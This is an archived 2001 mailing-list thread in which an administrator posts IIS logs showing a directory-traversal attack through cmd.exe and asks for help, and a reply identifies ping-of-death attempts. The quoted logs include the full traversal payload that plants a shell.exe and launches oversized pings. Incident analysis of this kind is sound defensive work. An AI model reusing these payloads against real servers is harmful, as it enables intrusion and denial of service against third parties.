Security Incidents mailing list archives

Re: Unicode Logs with Ping Activity

From: Vitaly Osipov <vosipov () wolfegroup ie>
Date: Wed, 11 Jul 2001 16:32:11 +0100


those pings are Ping-of death attempts with TOS (Type Of Service)
options - I don't know why options were used - maybe this increases the
possibility of crashing destination machine...



myrddin_e () hushmail com wrote:


Would like someone to help me understand what is going on here... The 502
error at the end end of these entries would indcicate failures, wouldn't
they? I've been all through the logs on this box, and even thought at every
attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe
shows a 502, it is there.

I'm looking at the times on the log entries and guessing that this was a
manual attack.

Also, can someone please explain what is being attempted with these pings?
aaa.aaa.aaa.aaa
bbb.bbb.bbb.bbb
ccc.ccc.ccc.ccc.ccc
ddd.ddd.ddd.ddd.ddd
are all unique addresses.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-06-19 18:44:15
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
uri-query sc-status cs(User-Agent)
2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
/c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
/c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd
502 -
Free, encrypted, secure Web-based email at www.hushmail.com

  ------------------------------------------------------------------------

----------------------------------------------------------------------------

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:

http://aris.securityfocus.com



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Current thread:

Unicode Logs with Ping Activity myrddin_e (Jul 10)
- Re: Unicode Logs with Ping Activity Jordan K Wiens (Jul 10)
  - 27015 probe increase?? cg (Jul 11)
    - Re: 27015 probe increase?? bhc2 (Jul 11)
    - Re: 27015 probe increase?? mstockda (Jul 11)
  - Re: Unicode Logs with Ping Activity Blake Frantz (Jul 11)
- Re: Unicode Logs with Ping Activity Vitaly Osipov (Jul 11)
- <Possible follow-ups>
- Re: Unicode Logs with Ping Activity myrddin_e (Jul 11)
  - Re: Unicode Logs with Ping Activity Vitaly Osipov (Jul 13)